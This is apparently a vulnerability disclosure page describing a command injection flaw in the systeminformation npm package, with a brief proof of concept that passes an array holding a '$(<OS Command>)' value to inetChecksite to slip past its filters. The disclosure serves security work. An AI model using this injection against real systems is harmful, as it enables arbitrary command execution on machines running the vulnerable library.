Command Injection in sebhildebrandt/systeminformation

Valid

Reported on

Feb 12th 2021

Description

systeminformation is vulnerable to Command Injection vulnerability.

It is possible to send an array containing OS commands, which bypass the filters.

Proof of Concept

  1. Create a Javascript file with the content below:
const si = require('systeminformation');
const command = "$(<OS Command>)";
si.inetChecksite([command]);

  1. Edit the constant command with a desired OS command.

  2. Run it.

Jamie Slome
3 years ago

Admin

@effectrenan - nice blog article!

to join this conversation